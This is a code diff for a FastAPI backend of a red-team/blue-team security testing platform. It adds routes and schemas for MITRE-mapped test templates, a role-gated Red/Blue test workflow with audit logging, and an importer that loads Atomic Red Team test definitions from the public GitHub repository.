from app.models.test_template import TestTemplate
from app.models.user import User
from app.schemas.test_template import (
TestTemplateCreate,
TestTemplateOut,
TestTemplateSummary,
)
from app.services.audit_service import log_action
router = APIRouter(prefix="/test-templates", tags=["test-templates"])
# ---------------------------------------------------------------------------
# GET /test-templates — list with filters + pagination
# ---------------------------------------------------------------------------
@router.get("", response_model=list[TestTemplateSummary])
def list_templates(
source: Optional[str] = Query(None, description="Filter by source (atomic_red_team, mitre, custom)"),
platform: Optional[str] = Query(None, description="Filter by platform (windows, linux, macos)"),
severity: Optional[str] = Query(None, description="Filter by severity (low, medium, high, critical)"),
mitre_technique_id: Optional[str] = Query(None, description="Filter by MITRE technique ID"),
search: Optional[str] = Query(None, description="Search in name and description"),
offset: int = Query(0, ge=0),
limit: int = Query(50, ge=1, le=200),
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user),
):
"""Return a paginated, filterable list of active test templates."""
query = db.query(TestTemplate).filter(TestTemplate.is_active == True) # noqa: E712
if source:
query = query.filter(TestTemplate.source == source)
if platform:
query = query.filter(TestTemplate.platform.ilike(f"%{platform}%"))
if severity:
query = query.filter(TestTemplate.severity == severity)
if mitre_technique_id:
query = query.filter(TestTemplate.mitre_technique_id == mitre_technique_id)
if search:
pattern = f"%{search}%"
query = query.filter(
or_(
TestTemplate.name.ilike(pattern),
TestTemplate.description.ilike(pattern),
)
)
templates = (
query
.order_by(TestTemplate.mitre_technique_id, TestTemplate.name)
.offset(offset)
.limit(limit)
.all()
)
return templates
# ---------------------------------------------------------------------------
# GET /test-templates/by-technique/{mitre_id}
# ---------------------------------------------------------------------------
@router.get("/by-technique/{mitre_id}", response_model=list[TestTemplateSummary])
def templates_by_technique(
mitre_id: str,
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user),
):
"""Return all active templates mapped to a specific MITRE technique."""
templates = (
db.query(TestTemplate)
.filter(
TestTemplate.mitre_technique_id == mitre_id,
TestTemplate.is_active == True, # noqa: E712
)
.order_by(TestTemplate.name)
.all()
)
return templates
# ---------------------------------------------------------------------------
# GET /test-templates/{id} — detail
# ---------------------------------------------------------------------------
@router.get("/{template_id}", response_model=TestTemplateOut)
def get_template(
template_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user),
):
"""Return full details for a single test template."""
template = db.query(TestTemplate).filter(TestTemplate.id == template_id).first()
if template is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Test template not found",
)
return template
# ---------------------------------------------------------------------------
# POST /test-templates — create (admin only)
# ---------------------------------------------------------------------------
@router.post(
"",
response_model=TestTemplateOut,
status_code=status.HTTP_201_CREATED,
)
def create_template(
payload: TestTemplateCreate,
db: Session = Depends(get_db),
current_user: User = Depends(require_role("admin")),
):
"""Create a custom test template. Admin only."""
template = TestTemplate(**payload.model_dump())
db.add(template)
db.commit()
db.refresh(template)
log_action(
db,
user_id=current_user.id,
action="create_test_template",
entity_type="test_template",
entity_id=template.id,
details={
"name": template.name,
"source": template.source,
"mitre_technique_id": template.mitre_technique_id,
},
)
return template
# ---------------------------------------------------------------------------
# PATCH /test-templates/{id} — update (admin only)
# ---------------------------------------------------------------------------
@router.patch("/{template_id}", response_model=TestTemplateOut)
def update_template(
template_id: uuid.UUID,
payload: TestTemplateCreate,
db: Session = Depends(get_db),
current_user: User = Depends(require_role("admin")),
):
"""Update fields of an existing test template. Admin only."""
template = db.query(TestTemplate).filter(TestTemplate.id == template_id).first()
if template is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Test template not found",
)
update_data = payload.model_dump(exclude_unset=True)
for field, value in update_data.items():
setattr(template, field, value)
db.commit()
db.refresh(template)
log_action(
db,
user_id=current_user.id,
action="update_test_template",
entity_type="test_template",
entity_id=template.id,
details={"updated_fields": list(update_data.keys())},
)
return template
# ---------------------------------------------------------------------------
# DELETE /test-templates/{id} — soft delete (admin only)
# ---------------------------------------------------------------------------
@router.delete("/{template_id}", status_code=status.HTTP_200_OK)
def delete_template(
template_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(require_role("admin")),
):
"""Soft-delete a test template by setting ``is_active=False``. Admin only."""
template = db.query(TestTemplate).filter(TestTemplate.id == template_id).first()
if template is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Test template not found",
)
template.is_active = False
db.commit()
log_action(
db,
user_id=current_user.id,
action="delete_test_template",
entity_type="test_template",
entity_id=template.id,
details={"name": template.name},
)
return {"detail": "Test template deactivated"}
+379 -89
View File
@@ -1,24 +1,110 @@
"""CRUD router for security Tests.""" """CRUD router for security Tests — v2 with Red/Blue workflow.
Endpoints
---------
GET /tests — list with filters (state, technique_id)
POST /tests — create (red_tech, admin)
POST /tests/from-template — create from TestTemplate (red_tech, admin)
GET /tests/{id} — detail with split red/blue evidences
PATCH /tests/{id} — general update (draft/rejected only)
PATCH /tests/{id}/red — Red Team updates (draft, red_executing)
PATCH /tests/{id}/blue — Blue Team updates (blue_evaluating)
POST /tests/{id}/start-execution — draft → red_executing
POST /tests/{id}/submit-red — red_executing → blue_evaluating
POST /tests/{id}/submit-blue — blue_evaluating → in_review
POST /tests/{id}/validate-red — Red Lead validates
POST /tests/{id}/validate-blue — Blue Lead validates
POST /tests/{id}/reopen — rejected → draft
GET /tests/{id}/timeline — audit-log history for this test
"""
import uuid import uuid
from datetime import datetime from typing import Optional
from fastapi import APIRouter, Depends, HTTPException, status from fastapi import APIRouter, Depends, HTTPException, Query, status
from sqlalchemy.orm import Session, joinedload from sqlalchemy.orm import Session, joinedload
from app.database import get_db from app.database import get_db
from app.dependencies.auth import get_current_user, require_role, require_any_role from app.dependencies.auth import get_current_user, require_any_role
from app.models.enums import TestState from app.models.audit import AuditLog
from app.models.enums import TestState, TeamSide
from app.models.technique import Technique from app.models.technique import Technique
from app.models.test import Test from app.models.test import Test
from app.models.test_template import TestTemplate
from app.models.user import User from app.models.user import User
from app.schemas.test import TestCreate, TestOut, TestUpdate, TestValidate from app.schemas.test import (
TestCreate,
TestOut,
TestUpdate,
TestRedUpdate,
TestBlueUpdate,
TestRedValidate,
TestBlueValidate,
)
from app.schemas.test_template import TestTemplateInstantiate
from app.services.audit_service import log_action from app.services.audit_service import log_action
from app.services.status_service import recalculate_technique_status from app.services.status_service import recalculate_technique_status
from app.services.test_workflow_service import (
start_execution as wf_start_execution,
submit_red_evidence as wf_submit_red,
submit_blue_evidence as wf_submit_blue,
validate_as_red_lead as wf_validate_red,
validate_as_blue_lead as wf_validate_blue,
reopen_test as wf_reopen,
)
router = APIRouter(prefix="/tests", tags=["tests"]) router = APIRouter(prefix="/tests", tags=["tests"])
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _get_test_or_404(db: Session, test_id: uuid.UUID) -> Test:
test = db.query(Test).filter(Test.id == test_id).first()
if test is None:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Test not found")
return test
def _get_test_with_technique(db: Session, test_id: uuid.UUID) -> Test:
test = (
db.query(Test)
.options(joinedload(Test.technique))
.filter(Test.id == test_id)
.first()
)
if test is None:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Test not found")
return test
# ---------------------------------------------------------------------------
# GET /tests — list with filters
# ---------------------------------------------------------------------------
@router.get("", response_model=list[TestOut])
def list_tests(
state: Optional[str] = Query(None, description="Filter by test state"),
technique_id: Optional[uuid.UUID] = Query(None, description="Filter by technique"),
offset: int = Query(0, ge=0),
limit: int = Query(50, ge=1, le=200),
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user),
):
"""Return a paginated list of tests, optionally filtered by state or technique."""
query = db.query(Test)
if state:
query = query.filter(Test.state == state)
if technique_id:
query = query.filter(Test.technique_id == technique_id)
tests = query.order_by(Test.created_at.desc()).offset(offset).limit(limit).all()
return tests
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# POST /tests — create (red_tech or admin) # POST /tests — create (red_tech or admin)
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@@ -36,10 +122,8 @@ def create_test(
): ):
"""Create a new test linked to an existing technique. """Create a new test linked to an existing technique.
The ``created_by`` field is set automatically to the current user and ``created_by`` is set automatically and ``state`` defaults to *draft*.
``state`` defaults to *draft*.
""" """
# Verify the parent technique exists
technique = db.query(Technique).filter(Technique.id == payload.technique_id).first() technique = db.query(Technique).filter(Technique.id == payload.technique_id).first()
if technique is None: if technique is None:
raise HTTPException( raise HTTPException(
@@ -69,7 +153,70 @@ def create_test(
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# GET /tests/{id} — detail (with evidences) # POST /tests/from-template — create from TestTemplate
# ---------------------------------------------------------------------------
@router.post(
"/from-template",
response_model=TestOut,
status_code=status.HTTP_201_CREATED,
)
def create_test_from_template(
payload: TestTemplateInstantiate,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_tech")),
):
"""Instantiate a real Test from an existing TestTemplate.
The template's fields are copied into the new test as starting data.
"""
template = db.query(TestTemplate).filter(TestTemplate.id == payload.template_id).first()
if template is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"TestTemplate with id '{payload.template_id}' not found",
)
technique = db.query(Technique).filter(Technique.id == payload.technique_id).first()
if technique is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"Technique with id '{payload.technique_id}' not found",
)
test = Test(
technique_id=payload.technique_id,
name=template.name,
description=template.description,
platform=template.platform,
procedure_text=template.attack_procedure,
tool_used=template.tool_suggested,
created_by=current_user.id,
state=TestState.draft,
)
db.add(test)
db.commit()
db.refresh(test)
log_action(
db,
user_id=current_user.id,
action="create_test_from_template",
entity_type="test",
entity_id=test.id,
details={
"name": test.name,
"template_id": str(template.id),
"technique_id": str(test.technique_id),
},
)
return test
# ---------------------------------------------------------------------------
# GET /tests/{id} — detail with evidences split by team
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@@ -97,7 +244,7 @@ def get_test(
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# PATCH /tests/{id} — update (creator or admin, only in draft/rejected) # PATCH /tests/{id} — general update (draft / rejected)
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@@ -113,22 +260,14 @@ def update_test(
Only the original creator or an admin can update. Only the original creator or an admin can update.
The test must be in ``draft`` or ``rejected`` state. The test must be in ``draft`` or ``rejected`` state.
""" """
test = db.query(Test).filter(Test.id == test_id).first() test = _get_test_or_404(db, test_id)
if test is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Test not found",
)
# Ownership / admin check
if current_user.role != "admin" and test.created_by != current_user.id: if current_user.role != "admin" and test.created_by != current_user.id:
raise HTTPException( raise HTTPException(
status_code=status.HTTP_403_FORBIDDEN, status_code=status.HTTP_403_FORBIDDEN,
detail="Not enough permissions", detail="Not enough permissions",
) )
# State guard
if test.state not in (TestState.draft, TestState.rejected): if test.state not in (TestState.draft, TestState.rejected):
raise HTTPException( raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST, status_code=status.HTTP_400_BAD_REQUEST,
@@ -155,83 +294,29 @@ def update_test(
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
# POST /tests/{id}/validate — validate (leads + admin) # PATCH /tests/{id}/red — Red Team update (draft, red_executing)
# --------------------------------------------------------------------------- # ---------------------------------------------------------------------------
@router.post("/{test_id}/validate", response_model=TestOut) @router.patch("/{test_id}/red", response_model=TestOut)
def validate_test( def update_test_red(
test_id: uuid.UUID, test_id: uuid.UUID,
payload: TestValidate, payload: TestRedUpdate,
db: Session = Depends(get_db), db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_lead", "blue_lead")), current_user: User = Depends(require_any_role("red_tech")),
): ):
"""Mark a test as validated. """Red Team updates their fields (allowed in ``draft`` and ``red_executing``)."""
test = _get_test_or_404(db, test_id)
Sets ``state`` to *validated*, records ``validated_by`` / ``validated_at``, if test.state not in (TestState.draft, TestState.red_executing):
stores the ``result``, and recalculates the parent technique's global status.
"""
test = (
db.query(Test)
.options(joinedload(Test.technique))
.filter(Test.id == test_id)
.first()
)
if test is None:
raise HTTPException( raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND, status_code=status.HTTP_400_BAD_REQUEST,
detail="Test not found", detail=f"Cannot update red fields in '{test.state.value}' state (must be draft or red_executing)",
) )
test.state = TestState.validated update_data = payload.model_dump(exclude_unset=True)
test.result = payload.result for field, value in update_data.items():
test.validated_by = current_user.id setattr(test, field, value)
test.validated_at = datetime.utcnow()
db.commit()
db.refresh(test)
# Recalculate the parent technique's global status
technique = test.technique
recalculate_technique_status(db, technique)
log_action(
db,
user_id=current_user.id,
action="validate_test",
entity_type="test",
entity_id=test.id,
details={
"result": payload.result.value,
"technique_id": str(test.technique_id),
},
)
return test
# ---------------------------------------------------------------------------
# POST /tests/{id}/reject — reject (leads + admin)
# ---------------------------------------------------------------------------
@router.post("/{test_id}/reject", response_model=TestOut)
def reject_test(
test_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_lead", "blue_lead")),
):
"""Reject a test, setting its state to *rejected*."""
test = db.query(Test).filter(Test.id == test_id).first()
if test is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Test not found",
)
test.state = TestState.rejected
db.commit() db.commit()
db.refresh(test) db.refresh(test)
@@ -239,10 +324,215 @@ def reject_test(
log_action( log_action(
db, db,
user_id=current_user.id, user_id=current_user.id,
action="reject_test", action="update_test_red",
entity_type="test", entity_type="test",
entity_id=test.id, entity_id=test.id,
details={"technique_id": str(test.technique_id)}, details={"updated_fields": list(update_data.keys())},
) )
return test return test
# ---------------------------------------------------------------------------
# PATCH /tests/{id}/blue — Blue Team update (blue_evaluating only)
# ---------------------------------------------------------------------------
@router.patch("/{test_id}/blue", response_model=TestOut)
def update_test_blue(
test_id: uuid.UUID,
payload: TestBlueUpdate,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("blue_tech")),
):
"""Blue Team updates their fields (allowed only in ``blue_evaluating``)."""
test = _get_test_or_404(db, test_id)
if test.state != TestState.blue_evaluating:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=f"Cannot update blue fields in '{test.state.value}' state (must be blue_evaluating)",
)
update_data = payload.model_dump(exclude_unset=True)
for field, value in update_data.items():
setattr(test, field, value)
db.commit()
db.refresh(test)
log_action(
db,
user_id=current_user.id,
action="update_test_blue",
entity_type="test",
entity_id=test.id,
details={"updated_fields": list(update_data.keys())},
)
return test
# ---------------------------------------------------------------------------
# POST /tests/{id}/start-execution — draft → red_executing
# ---------------------------------------------------------------------------
@router.post("/{test_id}/start-execution", response_model=TestOut)
def start_execution(
test_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_tech")),
):
"""Move a test from ``draft`` to ``red_executing``."""
test = _get_test_or_404(db, test_id)
test = wf_start_execution(db, test, current_user)
db.refresh(test)
return test
# ---------------------------------------------------------------------------
# POST /tests/{id}/submit-red — red_executing → blue_evaluating
# ---------------------------------------------------------------------------
@router.post("/{test_id}/submit-red", response_model=TestOut)
def submit_red(
test_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_tech")),
):
"""Red Team finalises — move from ``red_executing`` to ``blue_evaluating``."""
test = _get_test_or_404(db, test_id)
test = wf_submit_red(db, test, current_user)
db.refresh(test)
return test
# ---------------------------------------------------------------------------
# POST /tests/{id}/submit-blue — blue_evaluating → in_review
# ---------------------------------------------------------------------------
@router.post("/{test_id}/submit-blue", response_model=TestOut)
def submit_blue(
test_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("blue_tech")),
):
"""Blue Team finalises — move from ``blue_evaluating`` to ``in_review``."""
test = _get_test_or_404(db, test_id)
test = wf_submit_blue(db, test, current_user)
db.refresh(test)
return test
# ---------------------------------------------------------------------------
# POST /tests/{id}/validate-red — Red Lead validates
# ---------------------------------------------------------------------------
@router.post("/{test_id}/validate-red", response_model=TestOut)
def validate_red(
test_id: uuid.UUID,
payload: TestRedValidate,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_lead")),
):
"""Red Lead approves or rejects the red side of a test."""
test = _get_test_with_technique(db, test_id)
test = wf_validate_red(
db, test, current_user,
validation_status=payload.red_validation_status,
notes=payload.red_validation_notes,
)
# Recalculate technique status if test reached a terminal state
if test.state in (TestState.validated, TestState.rejected):
recalculate_technique_status(db, test.technique)
db.refresh(test)
return test
# ---------------------------------------------------------------------------
# POST /tests/{id}/validate-blue — Blue Lead validates
# ---------------------------------------------------------------------------
@router.post("/{test_id}/validate-blue", response_model=TestOut)
def validate_blue(
test_id: uuid.UUID,
payload: TestBlueValidate,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("blue_lead")),
):
"""Blue Lead approves or rejects the blue side of a test."""
test = _get_test_with_technique(db, test_id)
test = wf_validate_blue(
db, test, current_user,
validation_status=payload.blue_validation_status,
notes=payload.blue_validation_notes,
)
# Recalculate technique status if test reached a terminal state
if test.state in (TestState.validated, TestState.rejected):
recalculate_technique_status(db, test.technique)
db.refresh(test)
return test
# ---------------------------------------------------------------------------
# POST /tests/{id}/reopen — rejected → draft
# ---------------------------------------------------------------------------
@router.post("/{test_id}/reopen", response_model=TestOut)
def reopen(
test_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(require_any_role("red_lead", "blue_lead")),
):
"""Reopen a rejected test, moving it back to ``draft``."""
test = _get_test_or_404(db, test_id)
test = wf_reopen(db, test, current_user)
db.refresh(test)
return test
# ---------------------------------------------------------------------------
# GET /tests/{id}/timeline — audit history for this test
# ---------------------------------------------------------------------------
@router.get("/{test_id}/timeline")
def get_test_timeline(
test_id: uuid.UUID,
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user),
):
"""Return the chronological audit-log history for a test."""
# Verify the test exists
_get_test_or_404(db, test_id)
logs = (
db.query(AuditLog)
.filter(
AuditLog.entity_type == "test",
AuditLog.entity_id == str(test_id),
)
.order_by(AuditLog.timestamp.asc())
.all()
)
return [
{
"id": str(log.id),
"action": log.action,
"user_id": str(log.user_id) if log.user_id else None,
"timestamp": log.timestamp.isoformat() if log.timestamp else None,
"details": log.details,
}
for log in logs
]
+22 -1
View File
@@ -14,9 +14,20 @@ from app.schemas.test import (
TestOut, TestOut,
TestUpdate, TestUpdate,
TestValidate, TestValidate,
TestRedUpdate,
TestBlueUpdate,
TestRedValidate,
TestBlueValidate,
) )
from app.schemas.evidence import EvidenceOut from app.schemas.evidence import EvidenceOut, EvidenceUpload
from app.schemas.test_template import (
TestTemplateOut,
TestTemplateCreate,
TestTemplateSummary,
TestTemplateInstantiate,
)
__all__ = [ __all__ = [
# Auth # Auth
@@ -33,6 +44,16 @@ __all__ = [
"TestOut", "TestOut",
"TestUpdate", "TestUpdate",
"TestValidate", "TestValidate",
"TestRedUpdate",
"TestBlueUpdate",
"TestRedValidate",
"TestBlueValidate",
# Evidence # Evidence
"EvidenceOut", "EvidenceOut",
"EvidenceUpload",
# Test Template
"TestTemplateOut",
"TestTemplateCreate",
"TestTemplateSummary",
"TestTemplateInstantiate",
] ]
+11
View File
@@ -5,6 +5,8 @@ from datetime import datetime
from pydantic import BaseModel, ConfigDict from pydantic import BaseModel, ConfigDict
from app.models.enums import TeamSide
class EvidenceOut(BaseModel): class EvidenceOut(BaseModel):
"""Representation of an evidence record returned by the API. """Representation of an evidence record returned by the API.
@@ -18,6 +20,15 @@ class EvidenceOut(BaseModel):
sha256_hash: str sha256_hash: str
uploaded_by: uuid.UUID | None = None uploaded_by: uuid.UUID | None = None
uploaded_at: datetime | None = None uploaded_at: datetime | None = None
team: TeamSide = TeamSide.red
notes: str | None = None
download_url: str | None = None download_url: str | None = None
model_config = ConfigDict(from_attributes=True) model_config = ConfigDict(from_attributes=True)
class EvidenceUpload(BaseModel):
"""Metadata sent alongside an evidence file upload."""
team: TeamSide
notes: str | None = None
+74 -12
View File
@@ -10,6 +10,7 @@ from app.models.enums import TestResult, TestState
# ── Create ────────────────────────────────────────────────────────── # ── Create ──────────────────────────────────────────────────────────
class TestCreate(BaseModel): class TestCreate(BaseModel):
"""Payload for creating a new test.""" """Payload for creating a new test."""
@@ -21,7 +22,8 @@ class TestCreate(BaseModel):
tool_used: str | None = None tool_used: str | None = None
# ── Update ────────────────────────────────────────────────────────── # ── Update (general) ───────────────────────────────────────────────
class TestUpdate(BaseModel): class TestUpdate(BaseModel):
"""Payload for partially updating an existing test. """Payload for partially updating an existing test.
@@ -35,8 +37,63 @@ class TestUpdate(BaseModel):
result: TestResult | None = None result: TestResult | None = None
# ── Red Team update ────────────────────────────────────────────────
class TestRedUpdate(BaseModel):
"""Fields that Red Team fills in during the red_executing phase."""
name: str | None = None
description: str | None = None
procedure_text: str | None = None
tool_used: str | None = None
attack_success: bool | None = None
red_summary: str | None = None
# ── Blue Team update ───────────────────────────────────────────────
class TestBlueUpdate(BaseModel):
"""Fields that Blue Team fills in during the blue_evaluating phase."""
detection_result: TestResult | None = None
blue_summary: str | None = None
# ── Red Lead validation ────────────────────────────────────────────
class TestRedValidate(BaseModel):
"""Payload sent by Red Lead to approve/reject the red side."""
red_validation_status: str # "approved" or "rejected"
red_validation_notes: str | None = None
# ── Blue Lead validation ───────────────────────────────────────────
class TestBlueValidate(BaseModel):
"""Payload sent by Blue Lead to approve/reject the blue side."""
blue_validation_status: str # "approved" or "rejected"
blue_validation_notes: str | None = None
# ── Legacy validate (kept for backwards compat) ────────────────────
class TestValidate(BaseModel):
"""Payload sent by a reviewer to validate / reject a test."""
result: TestResult
comments: str | None = None
# ── Read (full) ───────────────────────────────────────────────────── # ── Read (full) ─────────────────────────────────────────────────────
class TestOut(BaseModel): class TestOut(BaseModel):
"""Complete representation returned by the API.""" """Complete representation returned by the API."""
@@ -51,17 +108,22 @@ class TestOut(BaseModel):
created_by: uuid.UUID | None = None created_by: uuid.UUID | None = None
result: TestResult | None = None result: TestResult | None = None
state: TestState = TestState.draft state: TestState = TestState.draft
validated_by: uuid.UUID | None = None
validated_at: datetime | None = None
created_at: datetime | None = None created_at: datetime | None = None
# Red Team fields
red_summary: str | None = None
attack_success: bool | None = None
red_validated_by: uuid.UUID | None = None
red_validated_at: datetime | None = None
red_validation_status: str | None = None
red_validation_notes: str | None = None
# Blue Team fields
blue_summary: str | None = None
detection_result: TestResult | None = None
blue_validated_by: uuid.UUID | None = None
blue_validated_at: datetime | None = None
blue_validation_status: str | None = None
blue_validation_notes: str | None = None
model_config = ConfigDict(from_attributes=True) model_config = ConfigDict(from_attributes=True)
# ── Validate ────────────────────────────────────────────────────────
class TestValidate(BaseModel):
"""Payload sent by a reviewer to validate / reject a test."""
result: TestResult
comments: str | None = None
+75
View File
@@ -0,0 +1,75 @@
"""Pydantic schemas for TestTemplate endpoints."""
import uuid
from datetime import datetime
from pydantic import BaseModel, ConfigDict
# ── Full output ─────────────────────────────────────────────────────
class TestTemplateOut(BaseModel):
"""Complete representation of a test template."""
id: uuid.UUID
mitre_technique_id: str
name: str
description: str | None = None
source: str
source_url: str | None = None
attack_procedure: str | None = None
expected_detection: str | None = None
platform: str | None = None
tool_suggested: str | None = None
severity: str | None = None
atomic_test_id: str | None = None
is_active: bool = True
created_at: datetime | None = None
model_config = ConfigDict(from_attributes=True)
# ── Create ──────────────────────────────────────────────────────────
class TestTemplateCreate(BaseModel):
"""Payload for creating a custom test template."""
mitre_technique_id: str
name: str
description: str | None = None
source: str = "custom"
source_url: str | None = None
attack_procedure: str | None = None
expected_detection: str | None = None
platform: str | None = None
tool_suggested: str | None = None
severity: str | None = None
atomic_test_id: str | None = None
# ── Summary (for listings) ─────────────────────────────────────────
class TestTemplateSummary(BaseModel):
"""Lightweight representation for listing templates."""
id: uuid.UUID
mitre_technique_id: str
name: str
source: str
platform: str | None = None
severity: str | None = None
model_config = ConfigDict(from_attributes=True)
# ── Instantiate (create a real Test from a template) ────────────────
class TestTemplateInstantiate(BaseModel):
"""Payload to create a real test from an existing template."""
template_id: uuid.UUID
technique_id: uuid.UUID
@@ -0,0 +1,231 @@
"""Atomic Red Team import service.
Downloads the Atomic Red Team repository ZIP from GitHub, parses every
``atomics/T*/T*.yaml`` file, and upserts :class:`TestTemplate` records
into the database.
Strategy
--------
The GitHub REST API without authentication only allows 60 req/hour.
Since the Atomic Red Team repo contains 1 500+ YAML files we avoid
per-file requests entirely. Instead we:
1. Download the full repo as a ZIP archive (~40 MB).
2. Extract in a temporary directory.
3. Walk ``atomics/T*/T*.yaml`` files parsing them with PyYAML.
4. Create / update ``TestTemplate`` rows keyed by ``atomic_test_id``.
5. Clean up the temporary directory.
Idempotency
-----------
Running the import twice does **not** create duplicates. Existing
templates are identified by their ``atomic_test_id`` and simply skipped.
"""
import io
import logging
import os
import shutil
import tempfile
import zipfile
from pathlib import Path
import requests as _requests
import yaml
from sqlalchemy.orm import Session
from app.models.test_template import TestTemplate
from app.services.audit_service import log_action
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
ATOMIC_RT_ZIP_URL = (
"https://github.com/redcanaryco/atomic-red-team"
"/archive/refs/heads/master.zip"
)
# Request timeout for the ZIP download (seconds)
_DOWNLOAD_TIMEOUT = 300
# Top-level directory name inside the ZIP
_ZIP_ROOT_PREFIX = "atomic-red-team-master"
# ---------------------------------------------------------------------------
# Internal helpers
# ---------------------------------------------------------------------------
def _download_zip(url: str = ATOMIC_RT_ZIP_URL) -> bytes:
"""Download the Atomic Red Team ZIP and return its raw bytes."""
logger.info("Downloading Atomic Red Team ZIP from %s", url)
resp = _requests.get(url, timeout=_DOWNLOAD_TIMEOUT, stream=True)
resp.raise_for_status()
content = resp.content
logger.info("Downloaded %.1f MB", len(content) / (1024 * 1024))
return content
def _extract_zip(zip_bytes: bytes, dest: str) -> Path:
"""Extract *zip_bytes* into *dest* and return the path to the atomics/ dir."""
with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
zf.extractall(dest)
atomics_dir = Path(dest) / _ZIP_ROOT_PREFIX / "atomics"
if not atomics_dir.is_dir():
raise FileNotFoundError(
f"Expected atomics directory not found at {atomics_dir}"
)
return atomics_dir
def _parse_yaml_files(atomics_dir: Path) -> list[dict]:
"""Walk the atomics directory and parse all technique YAML files.
Returns a flat list of dicts, each representing a single atomic test
with the following keys::
technique_id, index, name, description, platforms,
executor_type, command, source_url
"""
results: list[dict] = []
yaml_files = sorted(atomics_dir.glob("T*/T*.yaml"))
logger.info("Found %d YAML files to parse", len(yaml_files))
for yaml_path in yaml_files:
technique_id = yaml_path.stem # e.g. "T1059.001"
try:
with open(yaml_path, "r", encoding="utf-8") as fh:
data = yaml.safe_load(fh)
except Exception as exc:
logger.warning("Failed to parse %s: %s", yaml_path, exc)
continue
if not data or "atomic_tests" not in data:
continue
for idx, test in enumerate(data["atomic_tests"]):
name = test.get("name", "").strip()
description = test.get("description", "").strip()
platforms = test.get("supported_platforms", [])
executor = test.get("executor", {})
executor_type = executor.get("name", "") if isinstance(executor, dict) else ""
command = executor.get("command", "") if isinstance(executor, dict) else ""
# Build an atomic_test_id in the format "T1059.001-0"
atomic_test_id = f"{technique_id}-{idx}"
source_url = (
f"https://github.com/redcanaryco/atomic-red-team/blob/master"
f"/atomics/{technique_id}/{technique_id}.yaml"
)
results.append({
"technique_id": technique_id,
"index": idx,
"atomic_test_id": atomic_test_id,
"name": name,
"description": description,
"platforms": ", ".join(platforms) if isinstance(platforms, list) else str(platforms),
"executor_type": executor_type,
"command": command[:4000] if command else None, # cap at 4k chars
"source_url": source_url,
})
logger.info("Parsed %d atomic tests total", len(results))
return results
# ---------------------------------------------------------------------------
# Public API
# ---------------------------------------------------------------------------
def import_atomic_red_team(db: Session) -> dict:
"""Download and import Atomic Red Team tests as TestTemplates.
Parameters
----------
db : Session
Active SQLAlchemy database session.
Returns
-------
dict
Summary with keys ``created``, ``skipped_existing``,
``yaml_files_parsed``, ``total_tests_parsed``.
"""
tmp_dir = tempfile.mkdtemp(prefix="aegis_atomic_")
try:
zip_bytes = _download_zip()
atomics_dir = _extract_zip(zip_bytes, tmp_dir)
parsed_tests = _parse_yaml_files(atomics_dir)
finally:
# Always clean up
shutil.rmtree(tmp_dir, ignore_errors=True)
logger.info("Cleaned up temp directory %s", tmp_dir)
# Pre-load existing atomic_test_ids for dedup
existing_ids: set[str] = {
row[0]
for row in db.query(TestTemplate.atomic_test_id)
.filter(TestTemplate.atomic_test_id.isnot(None))
.all()
}
created = 0
skipped = 0
for item in parsed_tests:
if item["atomic_test_id"] in existing_ids:
skipped += 1
continue
template = TestTemplate(
mitre_technique_id=item["technique_id"],
name=item["name"][:500] if item["name"] else f"Atomic Test {item['atomic_test_id']}",
description=item["description"][:2000] if item["description"] else None,
source="atomic_red_team",
source_url=item["source_url"],
attack_procedure=item["command"],
platform=item["platforms"],
tool_suggested=item["executor_type"] if item["executor_type"] else None,
atomic_test_id=item["atomic_test_id"],
is_active=True,
)
db.add(template)
existing_ids.add(item["atomic_test_id"])
created += 1
db.commit()
# Count distinct YAML files by technique_id
yaml_files_count = len({t["technique_id"] for t in parsed_tests})
summary = {
"created": created,
"skipped_existing": skipped,
"yaml_files_parsed": yaml_files_count,
"total_tests_parsed": len(parsed_tests),
}
logger.info(
"Atomic Red Team import complete — created=%d, skipped=%d, "
"yaml_files=%d, total_tests=%d",
created, skipped, yaml_files_count, len(parsed_tests),
)
# Audit log (system action)
log_action(
db,
user_id=None,
action="import_atomic_red_team",
entity_type="test_template",
entity_id=None,
details=summary,
)
return summary
+25 -15
View File
@@ -1,36 +1,46 @@
